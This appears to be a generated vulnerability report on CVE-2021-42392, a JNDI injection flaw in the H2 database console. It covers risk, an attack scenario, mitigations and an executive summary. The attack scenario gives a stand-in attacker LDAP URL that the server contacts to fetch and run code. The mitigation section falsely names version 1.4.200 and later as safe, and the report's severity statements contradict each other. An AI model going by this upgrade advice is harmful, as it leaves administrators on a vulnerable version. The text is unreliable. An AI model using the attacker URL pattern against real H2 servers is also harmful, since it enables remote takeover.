Severity: Unknown
Description: The org.h2.util.JdbcUtils.getConnection method of the H2 database takes as parameters the class name of the driver and URL of the database. An attacker may pass a JNDI driver name and a URL leading to a LDAP or RMI servers, causing remote code execution. This can be exploited through various attack vectors, most notably through the H2 Console which leads to unauthenticated remote code execution.
CVSS Score: N/A
C
No data available.
No data available.
1. Risk Assessment
The vulnerability CVE-2021-42392 in the H2 database allows for remote code execution (RCE) via JNDI injection. The core issue is that the `org.h2.util.JdbcUtils.getConnection` method doesn't properly sanitize the driver class name and URL provided during database connection. An attacker can leverage this to specify a JNDI driver, pointing to a malicious LDAP or RMI server, ultimately executing arbitrary code on the affected system. The EPSS score of 0.907730000 suggests a high probability of exploitation. The most impactful vector is through the H2 Console, making it particularly dangerous as it often allows for unauthenticated access. The business impact can be significant, ranging from data breaches and data corruption to full system compromise and potential ransomware deployment. The likelihood of exploitation is considered high, especially if the H2 Console is exposed to the internet or a less-trusted network. The ease of exploitation is also relatively high, as it requires simply crafting a malicious URL. This vulnerability impacts confidentiality (potential data theft), integrity (potential data modification), and availability (potential system downtime).
2. Potential Attack Scenarios
An attacker can exploit this vulnerability through the H2 Console. The attack scenario unfolds as follows: An attacker discovers an exposed H2 Console instance, often accessible via a web browser. The attacker crafts a JDBC URL that specifies a malicious JNDI driver (e.g., `ldap://attacker.com/evil`) and a URL pointing to their controlled LDAP server. When the H2 Console attempts to connect to the database using this URL, it initiates a connection to the attacker's LDAP server. The attacker’s LDAP server responds with a Java class that contains malicious code. The H2 database then loads and executes this class, resulting in remote code execution on the server hosting the H2 database. The attacker gains control of the server, potentially installing malware, stealing sensitive data, or disrupting services. This scenario is particularly dangerous because the H2 Console often requires minimal or no authentication, allowing for easy exploitation.
3. Mitigation Recommendations
The primary mitigation is to upgrade to a patched version of H2 database. Versions 1.4.200 and later are resistant to this vulnerability. If upgrading immediately isn’t feasible, several workarounds can be implemented. Firstly, limit access to the H2 Console to trusted networks and consider enabling authentication. Secondly, if JNDI access is necessary, restrict the JNDI URL to trusted servers. Thirdly, consider setting the `sun.jndi.rmi.object.trustURLCodebase` property to `false` to prevent remote class loading from untrusted sources. This can be done via JVM arguments. Lastly, regularly monitor network traffic for unusual LDAP or RMI connections originating from the H2 database server.
Relevant resources include:
H2 Database Security Advisory: https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6
JFrog Blog: https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/
4. Executive Summary
CVE-2021-42392 represents a critical vulnerability in the H2 database that allows attackers to remotely execute code, potentially compromising the entire system. The vulnerability stems from insufficient validation of JDBC connection parameters, enabling JNDI injection. The H2 Console, often used for database administration, is a particularly vulnerable attack vector due to its frequently unauthenticated access. This could lead to data breaches, data corruption, or complete system takeover. To mitigate this risk, it’s essential to upgrade to H2 version 1.4.200 or later. If an immediate upgrade isn’t possible, restrict access to the H2 Console and limit JNDI access to trusted servers. Addressing this vulnerability is a high priority, as the potential business impact is significant, and exploitation is relatively straightforward. Prompt action will minimize the risk of a successful attack and protect valuable data and systems.